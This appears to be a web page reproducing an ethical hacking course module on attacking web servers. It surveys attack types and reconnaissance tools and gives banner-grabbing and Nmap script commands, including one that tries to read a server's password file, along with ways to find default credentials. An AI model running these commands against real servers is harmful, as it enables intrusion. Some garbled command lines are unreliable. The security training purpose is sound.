How to hack Web server | Types of Attack | Hacking Web Servers

 






Module Objectives

Most organizations consider their web presence to be an extension of themselves. Organizations create their web presence on the World Wide Web using websites associated with their business. Web servers are a critical component of a web infrastructure. A single vulnerability in web server configuration may lead to a security breach on websites. This makes web server security critical to the normal functioning of an organization.

This module starts with an overview of web server concepts. It provides an insight into various web server attacks, attack methodologies, and attack tools. Later, the module describes countermeasures against web server attacks, patch management, and security tools. The module ends with an overview of pen testing steps an ethical hacker should follow to perform the security assessment of the target.

At the end of this module, you will be able to perform the following:

■    Describe the web server concepts

■    Perform various web server attacks

■    Describe about web server attack methodology

■    Use different web server attack tools

■   Apply web server attack countermeasures

■    Describe the patch management concepts

■    Use different web server security tools

■    Perform web server penetration testing

Web Server Concepts

To  understand  web  server  hacking,  first  you  should  understand  web  server  concepts such as what a web server is, how it functions, and the other elements associated with it.

This section gives a brief overview of the web server and its architecture. It will also explain common reasons or mistakes made that allow attackers to hack a web server successfully. This section also describes the impact of attacks on the web server.

Web Server Operations

A web server is a computer system that stores, processes, and delivers web pages to the global clients via HTTP protocol. In general, a client initiates the communication process through HTTP requests. When a client wants to access any resource such as web pages, photos, videos, and so on, then the clients browser generates an HTTP request to the web server. Depending on the request, the web server collects the requested information/content from the data storage or from the application servers and responds to the clients request with an appropriate HTTP response. If a web server cannot find the requested information, then it generates an error message.

Components of a Web Server

A web server consists of the following components:

■ Document Root

Document root is one of the web server’s root file directories that stores critical HTML files related to the web pages of a domain name that will serve in response to the requests.

For example, if the requested URL is www.certifiedhacker.com and the document root is named as certroot and is stored in /admin/web directory, then /admin/web/certroot is the document directory address.

If  the  complete  request  is  www.certifiedhacker.com/P-folio/index.html,      the  server  will search for the file path/admin/web/certroot/P-folio/index.html.

■   Server Root

It is the top-level root directory under the directory tree in which the server's configuration and error, executable, and log files are stored. It consists of the code that implements the server. The server root, in general, consists of four files where one file is dedicated to the code that implements the server and other three are subdirectories, namely, -conf, -logs, and -cgi-bin used for configuration information, store logs, and executables, respectively.

■   Virtual Document Tree

Virtual document tree provides storage on a different machine or a disk after the original disk is filled-up. It is case sensitive and can be used to provide object-level security.

Visual Hosting

It is a technique of hosting multiple domains or websites on the same server. This allows sharing of resources between various servers. It is employed in large-scale companies where the company resources are intended to be accessed and managed globally.

Following are the types of virtual hosting: o Name-based hosting

o IP-based hosting o Port-based hosting

■ Web Proxy

A proxy server sits in between the web client and web server. Due to the placement of web proxies, all the requests from the clients will be passed on to the web server through the web proxies. They are used to prevent IP blocking and maintain anonymity


Open-source Web Server Architecture

Open-source web server architecture typically uses Linux, Apache, MySQL, and PHP (LAMP) as principal components.

Following are the functions of principal components in open source web server architecture: ■    Linux is the server's OS that provides secure platform for the web server

■   Apache is the web server component that handles each HTTP request and response ■    MySQL is a relational database used to store the web server's content and configuration

information

■    PHP is the application layer technology used to generate dynamic web content


IIS Web Server Architecture

Internet Information Service (IIS) is a web server application developed by Microsoft for Windows. IIS for Windows Server is a flexible, secure, and easy-to-manage web server for hosting anything on the web. It supports HTTP, HTTPS, FTP, FTPS, SMTP, and NNTP.

It has several components, including a protocol listener such as HTTP.sys and services such as World Wide Web Publishing Service (WWW Service) and Windows Process Activation Service (WAS). Each component functions in application and web server roles. These functions may include listening to requests, managing processes, reading configuration files, and so on.


Web Server Security Issue

A web server is a hardware/software application that hosts websites and makes them accessible over the internet. A web server, along with a browser, successfully implements client-server model architecture in which the web server plays the server part in the model and the browser acts as the client. To host websites, a web server actually stores various web pages of the websites and delivers the particular web page upon request. Each web server has a domain name and the IP address associated with that domain name. A web server can host more than one website. Any computer can act as a web server if it has specific server software (a web server program) installed in it and is connected to the internet.

Web servers are chosen based on their capability to handle server-side programming, security characteristics, publishing, search engine, and site-building tools. Apache, Microsoft IIS, Nginx, Google, and Tomcat are some of the most widely used web servers. An attacker usually targets vulnerability that exists in the software component and configuration errors to compromise web servers.

Organizations can defend most network-level and OS-level attacks by using network security measures such as firewalls, IDS, IPS, and so on and by following security standards and guidelines. This forces attackers to turn their attention to perform web server and web application-level attacks as web server hosting web applications is accessible from anywhere over the internet. This makes web servers an attractive target. A poorly configured web server can punch a hole in the most carefully designed firewall system. Attackers can exploit a poorly configured web server with known vulnerabilities to compromise the security of the web application. A leaky server can harm an organization. The following image shows an organizational security level diminishing from stack 1 to stack 7.

Common Goals behind Web Server Hacking

Attackers perform web server attacks with certain goals in mind. These goals may be either technical or non-technical. For example, attackers may breach security of the web server and steal sensitive information for financial gains or only for the sake of curiosity.

Following are some goals behind a web server attack:

■   Stealing credit cards or other sensitive credentials using phishing techniques ■    Integrating the server in a botnet in order to perform Denial of Service (DoS) or

Distributed Denial of Service (DDoS) attack

 ■    Compromising a database

■    Obtaining closed-source applications 

■    Hiding and redirecting traffic

■    Escalating privileges

Some attacks are not made to attain financial gains, but for personal reasons:

■    For the sake of pure curiosity

■    For the sake of achieving a self-set intellectual challenge

 ■   To damage the target organization's reputation

Dangerous Security Flaws Affecting Web Server Security

Web server configuration by poorly trained system administrators may leave security vulnerabilities in the web server. Inadequate knowledge, negligence, laziness, and inattentiveness toward security can pose the biggest threats to web server security. Following are some of the common oversights that make a web server vulnerable to attacks:

■    Not updating the web server with the latest patches

 ■    Using the same sys admin credentials everywhere 

■   Allowing unrestricted internal and outbound traffic

 ■    Running unhardened applications and servers 

■    Complacency

Why Web Servers are Compromised?

There are inherent security risks associated with the web servers, the local area networks that host websites, and the end-users who access these websites using browsers.

■ Webmaster's Concern: From a webmaster’s perspective, the biggest security concern is that the web server can expose the local area network (LAN) or the corporate intranet to threats the Internet poses. These may be in the form of viruses, Trojans, attackers, or the compromise of information itself. Bugs in software programs are often the source of security lapses. Web servers that are large complex devices also come with these inherent risks. In addition, the open architecture of the web servers allows arbitrary scripts to run on the server side while replying to the remote requests. Any CGI script installed at the site may contain bugs that are potential security holes.

■ Network Administrator's Concern: From a network administrator's perspective, a poorly configured web server poses another potential hole in the local network's security. While the objective of a web is to provide controlled access to the network, too much control can make a web almost impossible to use. In an intranet environment, the network administrator has to be careful about configuring the web server so that the legitimate users are recognized and authenticated and groups of users are assigned distinct access privileges.

■ End User's Concern: Usually, the end user does not perceive any immediate threat, as surfing the web appears both safe and anonymous. However, active content, such as ActiveX controls and Java applets, make it possible for harmful applications, such as viruses, to invade the user's system. In addition, active content from a website's browser can be a conduit for malicious software to bypass the firewall system and permeate the LAN.

Following are some of the methods to compromise a web server: 

■    Improper file and directory permissions

■    Installing the server with default settings

■    Unnecessary services enabled, including content management and remote administration

■   Security conflicts with business ease-of-use case

■    Lack of proper security policy, procedures, and maintenance

■    Improper authentication with external systems

■    Default accounts with their default or no passwords

■    Unnecessary default, backup, or sample files

■    Misconfigurations in web server, OS, and networks

■    Bugs in server software, OS, and web applications

■    Misconfigured SSL certificates and encryption settings

■ Administrative or debugging functions that are enabled or accessible on web servers

■    Use of self-signed certificates and default certificates

Impact of Web Server Attacks

Attackers can  cause various kinds of damages  to  an organization by attacking a web server. Following are some of the damages attackers can cause to a web server:

■ Compromise of user account: Web server attacks are mostly concentrated on compromising user account. If the attacker compromises a user account, then the attacker can gain a lot of useful information. Then, the attacker can use the compromised user account to launch further attacks on the web server.

■ Website defacement: Attackers completely change the appearance of the website by replacing the original data. They change the website's look by changing the visuals and displaying different pages with messages of their own.

■    Secondary attacks from the website: An attacker who compromises a web server can use the server to launch further attacks on various websites or client systems.

■ Root access to other applications or server: Root access is the highest privilege one gets to log in to a network, be it a dedicated server, semi-dedicated, or virtual private server. Attackers can perform any action once they get root access to the server.

■    Data tampering: An attacker can alter or delete the data and can even replace the data with malware in order to compromise whoever connects to the web server.

■ Data theft: Data is one of the primary assets of an organization. Attackers can get access to sensitive data such as financial records, future plans, or the source code of a program.


Web Server Attacks

An attacker can use many techniques to compromise a web server such as DoS/DDoS, DNS server hijacking, DNS amplification, directory traversal, Man-in-the-Middle (MITM)/sniffing, phishing, website defacement, web server misconfiguration, HTTP response splitting, web cache poisoning, SSH brute force, web server password cracking, and so on. This section describes these possible attacks in detail.


DoS/DDoS Attacks

A DoS/DDoS attack involves flooding targets with numerous fake requests so that the target stops functioning and will be unavailable to the legitimate users. Using a web server DoS/DDoS attack, an attacker attempts to take the web server down or make it unavailable to the legitimate users. A web server DoS/DDoS attack often targets high-profile web servers such as banks, credit card payment gateways, and even root name servers.

To  crash  the  web  server  running  the  application,  attacker  targets  the  following  services  by consuming the web server with fake requests.


■ Network bandwidth

■ Server memory

■ Application exception handling mechanism

■ CPU usage

■ Hard disk space 

■ Database space


DNS Server Hijacking

Domain Name System (DNS) resolves a domain name to its corresponding IP address. A user queries the DNS server with a domain name, and it delivers the corresponding IP address.

In a DNS server hijacking, an attacker compromises the DNS server and changes the mapping settings of the target DNS server to redirect toward a rogue DNS server so that it would redirect the user's requests to the attacker's rogue server. Thus, when the user types the legitimate URL in a browser, the settings will redirect to the attacker's fake site.

DNS Amplification Attack

Recursive DNS Query is a method of requesting DNS mapping. The query goes through domain name servers recursively until it fails to find the specified domain name to IP address mapping.


Following are the steps involved in processing recursive DNS request:

■   Stepl:

Users who want to resolve the IP address for a specific domain send a DNS query to the primary DNS server specified in its TCP/IP properties.

■   Steps 2 to 7:

If the requested DNS mapping is not present on the user's primary DNS server, then it will forward the request to the root server. The root server will forward the request to .com namespace where the user could find DNS mappings. This process repeats recursively until DNS mapping is resolved.

■   Step 8:

Ultimately,  when  the  system  finds  the  primary  DNS  server  for  the  requested  DNS mapping, it generates a cache for the IP address in the user's primary DNS server.

Attackers  exploit  recursive  DNS  queries  to  perform  a  DNS  amplification  attack  that  results  in DDoS attacks on the victim's DNS server.

Following are the steps involved in DNS amplification attack:

■   Step 1:

The attacker instructs compromised hosts (bots) to make DNS queries in the network. ■   Step 2:

All  the  compromised  hosts  use  spoofed  victim's  IP  address  and  sends  DNS  query requests to the victim's primary DNS server configured in its TCP/IP settings.

■   Steps 3 to 8:

If the requested DNS mapping is not present on the victim's primary DNS server, the server forwards the requests to the root server. The root server will forward the request to .com or respective TLD namespaces. This process repeats recursively until the victim's primary DNS server resolves the DNS mapping request.

■ Step 9:

After the primary DNS server finds the DNS mapping for the victim's request, it sends a DNS mapping response to the victim's IP address. This response goes to the victim as bots are using the victim's IP address. The replies to a large number of DNS mapping requests from the bots result in DDoS on the victim's DNS server.

Directory Traversal Attacks

An attacker may be able to perform a directory traversal attack due to a vulnerability present in the code of the web application. In addition to this, poorly patched or configured web server software can make the web server itself vulnerable to a directory traversal attack.

The design of web servers limits public access to some extent. Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside of the web server's root directory by manipulating a URL. In directory traversal attacks, attackers use ../ (dot-dot-slash) sequence to access restricted directories outside of the web server's root directory. Attackers can use the trial-and-error method to navigate outside of the root directory and access sensitive information in the system.

An attacker exploits the software (web server program) on the web server to perform directory traversal attacks. The attacker usually performs this attack with the help of a browser. A web server is vulnerable to this attack if it accepts input data from a browser without proper validation.

Man-in-the-Middle/Sniffing Attack

Man-in-the-Middle (MITM) attacks allow an attacker to access sensitive information by intercepting and altering communications between an end-user and web servers. In an MITM attack or sniffing attack, an intruder intercepts or modifies the messages exchanged between the user and web server through eavesdropping or intruding into a connection. This allows an attacker to steal sensitive user information such as online banking details, usernames, passwords, and so on, transferred over the Internet to the web server. The attacker lures the victim to connect to the web server by pretending to be a proxy. If the victim believes and agrees to the attacker's request, then all the communication between the user and the web server passes through the attacker. In this way, the attacker can steal sensitive user information.


Phishing Attacks

Attackers perform a phishing attack by sending an email containing a malicious link and tricking the user to click it. Clicking the link will redirect the user to a fake website that looks similar to the legitimate website. The attackers create such websites using their address hosted on web servers. When a victim clicks on the malicious link believing the link is a legitimate website address, it redirects to the malicious website hosted on the attacker's server. The website prompts the user to enter sensitive information such as username, passwords, financial account information, social security numbers, and so on and divulges the data to the attacker. Later, the attacker may be able to establish a session with the legitimate website with the victim's stolen credentials in order to perform a malicious operation on the target legitimate website.

Website Defacement

Website defacement refers to the unauthorized changes made to the content of a single web page or an entire website, resulting in changes to the visual appearance of the website or a web page. Hackers break into web servers and alter the hosted website by injecting code in order to add images, popups, or text to a page in such a way that the visual appearance of the page changes. In some cases, the attacker may replace the entire website instead of just changing single pages.

Defaced pages exposes visitors to some propaganda or misleading information until the unauthorized changes are discovered and corrected. Attackers use variety of methods such as MySQL injection to access a website in order to deface it. In addition to changing the visual appearance of the target website, attackers deface websites for infecting the computers of visitors by making the website vulnerable to virus attacks. Thus, website defacement not only embarrasses the target organization by changing the appearance of its website but is also intended to harm its visitors.


Web Server Misconfiguration

Web server misconfiguration refers to the configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers such as directory traversal, server intrusion, and data theft.

Following are some of the webserver misconfigurations:

■   Verbose Debug/Error Messages

■   Anonymous or Default Users/Passwords ■   Sample Configuration and Script Files ■    Remote Administration Functions

■    Unnecessary Services Enabled

■    Misconfigured/Default SSL Certificates An Example of a Web Server Misconfiguration

"Keeping the server configuration secure requires vigilance"—OWASP

Administrators who configure web servers improperly may leave serious loopholes in the web server thereby giving an attacker the chance to exploit the misconfigured web server to compromise its security and obtain sensitive information. The vulnerabilities of improperly configured web servers may be related to configuration, applications, files, scripts, or web pages. An attacker looks for such vulnerable web servers to launch attacks. The misconfiguration of a web server gives the attacker a path to enter into the target network of an organization. These loopholes in the server can also help an attacker to bypass user 

authentication.  Once  detected,  these  problems  can  be  easily  exploited  and  result  in  the  total compromise of a website hosted on the target web server.

Below figure shows the configuration that allows anyone to view the server status page, which contains detailed information about the current use of the web server, including information about the current hosts and requests being processed.

<Location /server-status> SetHandler server-status </Location>

FIGURE 13.2: Screenshot displaying httpd.conf file on an Apache server

Below figure shows configuration that gives verbose error messages.

display_error ■ On

log_errors - On

error_log » syslog

ignore_repeated_errors "Off

FIGURE 13.3: Screenshot displaying php.ini file


HTTP Response-Splitting Attack

An HTTP response-splitting attack is a web-based attack in which the attacker tricks the server by injecting new lines into response headers, along with arbitrary code. It involves adding header response data into the input field so that the server splits the response into two responses. This type of attack exploits vulnerabilities in input validation. Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), and SQL Injection are some of the examples of this type of attack. In this attack, the attacker controls the input parameter and cleverly constructs a request header that causes two responses from the server. The attacker alters a single request to appear as two requests by adding header response data into the input field. The web server in turn responds to each request. The attacker can pass malicious data to a vulnerable application, and the application includes the data in an HTTP response header. The attacker can control the first response to redirect the user to a malicious website, whereas the web browser will discard other responses.

Example of an HTTP Response-Splitting Attack

In this example, the attacker sends a response-splitting request to the web server. The server splits the response into two and sends the first response to the attacker and the second response to the victim. After receiving the response from web server, the victim requests service by providing credentials. At the same time, the attacker requests the index page. Then the web server sends the response to the victim's request to the attacker and the victim remains uninformed.


Web Cache Poisoning Attack

Web cache poisoning attacks the reliability of an intermediate web cache source. In this attack, the attackers swap cached content for a random URL with infected content. Users of the web cache source can unknowingly use the poisoned content instead of true and secured content when requesting the required URL through the web cache.

An attacker forces the web server's cache to flush its actual cache content and sends a specially crafted request to store in cache. In this case, all the users of that web server cache will get malicious content until the servers flush the web cache. Web cache poisoning attacks are possible if the web server and application has HTTP Response-Splitting flaws.


SSH Brute Force Attack

Attackers use the SSH protocols to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network. Usually SSH runs on TCP port 22. In order to conduct an attack on SSH, the attacker scans the entire SSH server using bots (performs TCP port 22 port scan) to identify possible vulnerabilities. With the help of a brute force attack, the attacker gains the login credentials to get unauthorized access to an SSH tunnel. An attacker who gains the login credentials of SSH can use the same SSH tunnels to transmit malware and other means of exploitation to victims without being detected. Attackers use tools such as Nmap and ncrack on a Linux platform to perform an SSH brute force attack.


Web Server Password Cracking

An attacker tries to exploit weaknesses to hack well-chosen passwords. The most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, and so on.

Attacker targets mainly for the following: ■   SMTP and FTP servers

■ Web shares ■ SSH tunnels

■   Web form authentication cracking

Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan horse or virus, wiretapping, keystroke logging, and so on. Many hacking attempts start with cracking passwords and prove to the web server that they are a valid user.

Web Server Password Cracking Techniques

Cracking a password is the most common method of gaining unauthorized access to the web server by exploiting its flawed and weak authentication mechanism. Once the password is cracked, an attacker can use those passwords to launch further attacks.

Attackers can use the following password cracking techniques to extract passwords from web servers, FTP servers, SMTP servers, and so on. Let us get into the details of various password cracking tools and techniques used by the attacker to crack passwords. Attackers can crack passwords either manually or with automated tools such as Cain & Abel, Brutus, THC Hydra, and so on.


■ Guessing: This is most common method of cracking passwords in which the attacker guesses possible passwords either manually or by using automated tools provided with dictionaries. Most people tend to use their pets' names, loved ones' names, license plate numbers, dates of birth, or other weak passwords such as "QWERTY," "password," "admin," and so on so that they can remember them easily. The attacker exploits this human behavior of keeping things simple to crack passwords.

■ Dictionary Attack: A dictionary attack has predefined file of words of various combinations, and an automated program tries entering these words one at a time to see if any of them are the password. This might not be effective if the password includes special characters and symbols. If the password is a simple word, then it can be found quickly. Compared to a brute force attack, a dictionary attack is less time-consuming.

■ Brute Force Attack: In the brute force method, all possible characters are tested, for example, uppercase from A to Z, numbers from 0 to 9, and lowercase from a to z. This method is useful to identify one-word or two-word passwords. If a password consists of uppercase and lowercase letters and special characters, it might take months or years to crack the password using a brute force attack.

■ Hybrid Attack: A hybrid attack is more powerful as it uses both a dictionary attack and brute force attack. It also uses symbols and numbers. Password cracking becomes easier with this method.


Web Application Attacks

Even if web servers are configured securely or are secured using network security measures such as firewalls, a poorly coded web application deployed on the web server may give a path to an attacker to compromise the web server's security. If the web developers do not adopt secure coding practices while developing web applications, it may give attackers the chance to exploit vulnerabilities and compromise web applications and web server security. An attacker can perform different types of attacks on vulnerable web applications to breach web server security.

■ Parameter/Form Tampering: In this type of tampering attack, the attacker manipulates the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, and so on.

■ Cookie Tampering: Cookie tampering attacks occur when sending a cookie from the client side to the server. Different types of tools help in modifying persistent and non- persistent cookies.

■ Unvalidated Input and File Injection Attacks: Unvalidated input and file injection attacks are performed by supplying an unvalidated input or by injecting files into a web application.

■ SQL Injection Attacks: SQL injection t exploits the security vulnerability of a database for attacks. The attacker injects malicious code into the strings, later passed on to the SQL Server for execution.

■ Session Hijacking: Session hijacking is an attack in which the attacker exploits, steals, predicts, and negotiates the real valid web session's control mechanism to access the authenticated parts of a web application.


■ Directory Traversal: Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside of the web server's root directory by manipulating a URL

■    Denial-of-Service (DoS) Attack: A DoS attack is intended to terminate the operations of a website or a server and make it unavailable for access by intended users.

■     Cross-Site  Scripting  (XSS)  Attacks:  In  this  method,  an  attacker  injects  HTML  tags  or scripts into a target website.

■ Buffer Overflow Attacks: The design of most web applications helps them in sustaining some amount of data. If that amount exceeds the storage space available, the application may crash or may exhibit some other vulnerable behavior. The attacker uses this advantage and floods the application with too much data, which in turn causes a buffer overflow attack.

■      Cross-Site  Request   Forgery  (CSRF)   Attack:  An   attacker   exploits  the  trust   of   an authenticated user to pass malicious code or commands to the web server.

■ Command Injection Attacks: In this type of attack, a hacker alters the content of the web page by using html code and by identifying the form fields that lack valid constraints.

■ Source Code Disclosure: Source code disclosure is a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. This disclosure can sometimes allow the attackers to gain sensitive information about database credentials and secret keys and compromise the web servers.


Web Server Attack Methodology

The previous section described attacks that an attacker can perform to compromise web server's security. This section explains exactly how the attacker moves forward in performing a successful attack on a web server. A web server attack typically involves preplanned activities called an attack methodology that an attacker follows to reach the goal of breaching the target web server's security.


Attackers hack a web server in multiple stages. At each stage, the attacker tries to gather more information about the loopholes and tries to gain unauthorized access to the web server. Following are the stages of web server's attack methodology:

■    Information Gathering

Every attacker tries to collect as much information as possible about the target web server. The attacker gathers the information and then analyzes the information in order to find lapses in the current security mechanism of the web server.

■    Web Server Footprinting

The purpose of footprinting is to gather more information about security aspects of a web server with the help of tools or footprinting techniques. The main purpose is to know about the web server's remote access capabilities, its ports and services, and other aspects of its security.

■    Website Mirroring

Website mirroring is a method of copying a website and its content onto another server for offline browsing. With a mirrored website, an attacker can view the detailed structure of the website.

■   Vulnerability Scanning

Vulnerability scanning is a method to find vulnerabilities and misconfigurations of a web server. Attackers scan for vulnerabilities with the help of automated tools known as vulnerability scanners.

■    Session Hijacking

Attackers can perform session hijacking after identifying the current session of the client. The attacker takes over complete control of the user session by means of session hijacking.

■    Web Server Passwords Hacking

Attackers  use  password-cracking  methods  such  as  brute  force  attacks,  hybrid  attacks, dictionary attacks, and so on, to crack web server's password.


Information Gathering

Information gathering is the first and one of the important steps toward hacking a target web server. An attacker collects as much information as possible about the target server by using various tools and techniques. The information obtained from this step helps the attacker in assessing the security posture of the web server. Attackers may search the Internet, newsgroups, bulletin boards, and so on for information about the target organization. Some of the following tools help the attacker to extract information such as the targets domain name, IP address, autonomous system number, and so on.

■   WHOis

Source: https://www.whois.net

WHOis.net is designed to help you perform a variety of whois lookup functions. It lets you perform a domain whois search, whois IP lookup, and search the whois database for relevant information on domain registration and availability. This can help provide insight into a domain's history and additional information. Use whois lookup anytime you want to perform a search to see who owns a domain name, how many pages from a site are listed with Google, or even search whois address listings for a website's owner.

Following are some of the additional information-gathering tools: ■   Whois Lookup (http://whois.domaintools.com)

■   Whois (https://www.whois.com)

■    DNSstuff Toolbox (http://www.dnsstuff.com) ■    Domain Dossier (http://centralops.net)

■    Find Subdomains (https://pentest-tools.com)

■   Whois Online (http://whois.online-domain-tools.com) ■   SmartWhois (http://www.tamos.com)

■   Whois Lookup Multiple Addresses Software (https://www.sobolsoft.com)

Note:   For   complete   coverage   of   information-gathering   techniques   refer   to   Module   02: Footprinting and Reconnaissance.


Information Gathering from Robots.txt File

A website owner creates robots.txt file to list for a web crawler those files or directories it should index in search results. Poorly written robots.txt files can cause complete indexing of website files and directories. In this case, an attacker may easily get information such as passwords, email addresses, hidden links, and membership areas if there have indexed confidential files and directories in the search results.

If the owner of the target website writes the robots.txt file and does not allow indexing of restricted pages in the search results, an attacker can still easily view the robots.txt file of that site to discover restricted files, and then view them to gather information.

An attacker types URL/robots.txt in the address bar of a browser to view the target website's robots.txt file. An attacker can also download the robots.txt file of a target website using the Wget tool.


Web Server Footprinting/Banner Grabbing

By performing web server footprinting, you can gather valuable system-level data such as account details, OS, software versions, server names, and database schema details. Use Telnet utility in order to footprint a web server and gather information such as server name, server type, operating systems, applications running, and so on. Use footprinting tools such as Netcraft, ID Serve and httprecon, and so on to perform web server footprinting. Web server footprinting tools such as Netcraft, ID Serve, and httprecon can extract information from the target server. Let us look at the features and the type of information these tools are able to collect from the target server.


Web Server Footprinting Tools

■ Netcat

Source: http://netcat.sourceforge.net

Netcat is a networking utility that reads and writes data across network connections, using the TCP/IP protocol. It is a reliable "back-end" tool used directly or driven by other programs and scripts. It is also a network debugging and exploration tool.

o Outbound and inbound connections, TCP or UDP, to or from any ports

o Tunneling mode, which allows special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface), and the remote host allowed to connect to the tunnel

o Built-in port-scanning capabilities with randomizer

o   Usage   options,   such  as   buffered  send-mode  (one   line  every  N   seconds)   and hexdump (to stderr or to a specified file) of transmitted and received data

o Optional RFC854 telnet codes parser and responder

Discussed    below    are    commands    used    to    perform    banner    grabbing    (e.g., www.moviescope.com) to gather information (e.g., server type, and version).

o # nc -w www.moviescope.com 80 - press[Enter] o get / http/1.0 - Press [Enter] twice

■   Telnet

Source: https://technet.microsoft.com

Telnet is a network protocol. It is widely used on the Internet or LANs. It is a client­ server protocol. It provides the login sessions for a user on the Internet. The single terminal attached to other computer emulates with Telnet. The primary security problems with Telnet are the following:

o It does not encrypt any data sent through the connection. o It lacks an authentication scheme.

Telnet  helps  the  user  to  perform  banner-grabbing  attack.  It  probes  HTTP  servers  to determine the Server field in the HTTP response header.

For instance, to enumerate a host running on http (TCP 80), follow the procedure given below:

o    Request    telnet    to    connect    to    a    host    on    a    specific    port:    C:\>telnet www.moviescope.com 80 and press Enter. A blank screen appears.

o Type GET / http/1.0 and press Enter twice.

The HTTP server responds with the information (see the screenshot in the slide). ■    N etc raft

Source: https://www.netcraft.com

Netcraft determines the OS of the queried host by looking in detail at the network characteristics of the HTTP response received from the website. Netcraft identifies vulnerabilities in the web server via indirect methods: fingerprinting the OS, the software  installed,  and  the  configuration  of  that  software  gives  enough  information  to determine whether the server may be vulnerable to an exploit.

■ http recon

Source: http://www.computec.ch

httprecon is a tool for advanced web server fingerprinting. This tool performs banner­ grabbing attacks, status code enumeration, and header ordering analysis on the target web server. This tool provides accurate web server fingerprinting information,

httprecon performs the following header analysis test cases on the target web server:

o legitimate GET request for an existing resource

o very long GET request (>1024 bytes in UR I)

o common GET request for a non-existing resource

o common HEAD request for an existing resource

o allowed method enumeration with OPTIONS

o usually not permitted http method DELETE

o not defined http method TEST

o non-existing protocol version HTTP/9.8

o GET request including attack patterns (e.g.,:../ and %%)

■ ID Serve

Source: https://www.grc.com

ID  Serve  is  a  simple  Internet  server  identification  utility.  Following  is  a  list  of  its capabilities:

o HTTP Server Identification: ID Serve can identify the make, model, and version of a website's server software. ID Serve sends this information in the preamble of replies to web queries, but the information is not visible to the user.

o Non-HTTP Server Identification: Most non-HTTP (non-web) Internet servers (e.g., FTP, SMTP, POP, and NEWS) are required to transmit a line containing a numeric status code and a human-readable greeting to any connecting client. Therefore, ID Serve can also connect with non-web servers to receive and report the server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information.

o Reverse DNS Lookup: When ID Serve users enter a site's or server's domain name or URL, the application will use DNS to determine the IP address for that domain. However, sometimes it is useful to go in the other direction to determine the domain name associated with a known IP address. This process, known as reverse DNS lookup, is also built into ID Serve. ID Serve will attempt to determine the associated domain name or any entered IP address.

Ethical Hacking and Countermeasures Hacking Web Servers

Following are some of the additional footprinting tools:

■    Recon-ng (https://bitbucket.org)

■    Uniscan (https://sourceforge.net)

■   SpiderFoot (http://www.spiderfoot.net)

■    httprint (http://www.net-square.com)

■    Nmap (https://nmap.org)

■   ScanLine (https://www.mcafee.com)

■   X probe (https://sourceforge.net)

■    POf (https://github.com)

■   Satori (http://chatteronthewire.org)

■   Thanos (https://github.com)

■    Bannergrab (https://sourceforge.net)

■    synscan (http://synscan.sourceforge.net)

■    Disco (http://www.altmode.com)

■    Winfingerprint (http://qpdownload.com)

■    NetworkMiner (http://www.netresec.com)


Enumerating Web Server Information Using Nmap Source: https://nmap.org

Nmap along with Nmap Scripting Engine can extract lot of valuable information from the target web server. In addition to Nmap commands, Nmap Scripting Engine (NSE) provides scripts that reveals all sorts of useful information to an attacker from the target web server.

An attacker uses the following Nmap commands and NSE scripts to extract information:

■    Discover virtual domains with hostmap

$nmap --script hostmap <host>

■    Detect a vulnerable server that uses the TRACE method

nmap —script http-trace -p80 localhost

■ Harvest email accounts with http-google-email

$nmap --script http-google-email <host>

■    Enumerate users with http-userdir-enum

nmap -p80 —script http-userdir -enum localhost ■    Detect HTTP TRACE

$nmap -p80 —script http-trace <host>

■   Check if web server is protected by a WAF/IPS


■    Enumerate common web applications

$nmap —script http-enum -p80 <host> ■    Obtain robots.txt

$nmap -p80 --script http-robots.txt <host>

Below are some of the additional Nmap commands used to extract information:

■    nmap sV -O -p target IP address

■    nmap -sV --script=http-enum target IP address

■    nmap target IP address -p 80 --script = http-frontpage-login

■    nmap --script http-passwd --script-args http-passwd.root =/ target IP address


Website Mirroring

Website mirroring copies an entire website and its content onto the local drive. The mirrored website reveals the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. With a mirrored target website, an attacker can easily trace out the website's directories and gain valuable information. An attacker who copies the website does not need to be online to go through the target website. The attacker can trace out the website at any time. The attacker can gain valuable information by searching the comments and other items in the HTML source code of downloaded web pages. There are many website mirroring tools available to copy a target website onto a local drive, such as HTTrack, WebCopier Pro, Website Ripper Copier, GNU Wget, and so on.

■    HTTrack

Source: https://www.httrack.com

HTTrack is an offline browser utility. It downloads a Website from the Internet to a local directory, building all directories recursively, getting HTML, images, and other files from the server. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in a browser, browse the site from link to link, as if viewing it online.

Following are some of the additional website mirroring tools: ■    WebCopier Pro (http://www.moximumsoft.com) ■    Website Ripper Copier (http://www.tensons.com) ■   GNU Wget (https://www.gnu.org)

■    Pavuk Web Spider and Performance Measure (http://pavuk.sourceforge.net)

■    Getleft (https://sourceforge.net)

■    Offline Downloader (http://www.offlinedownloader.com)

■   WebRipper (http://visualwebripper.com)

■   SurfOffline (http://surfoffline.com)

■    NCollector Studio (http://www.calluna-software.com)

■    Portable Offline Browser (http://www.metaproducts.com)

■    Backstreet Browser (http://www.spadixbd.com)

■ Offline Explorer Enterprise (http://www.metaproducts.com)

■   Teleport Pro (http://www.tenmax.com)

■    Hooeey Webprint (http://www.hooeeywebprint.com)

■   Visual SEO Studio (https://visual-seo.com)


Finding Default Credentials of a Web Server

The admins or security personnel use administrative interfaces to securely configure, manage, and monitor web application servers. Many web server administrative interfaces are publically accessible and are located in the web root directory. Often these administrative interface credentials are not properly configured and remain set to default. Attackers attempt to identify the running application interface of the target web server by performing port scanning. Once the running administrative interface is identified, the attacker performs following techniques to identify the default login credentials:

■   Consult the administrative interface documentation and identify the default passwords ■    Use Metasploit's built-in database to scan the server

■    Use online resources such as Open Sez Me (http://open-sez.me) and cirt.net (https://cirt.net/passwords) to find the default passwords

■   Attempt password-guessing and brute-forcing attacks

Finding these default credentials can gain access to the administrative interface compromising the respective web server and indeed allowing the attacker to exploit the main web application itself.

■   cirt.net

Source: https://cirt.net/passwords

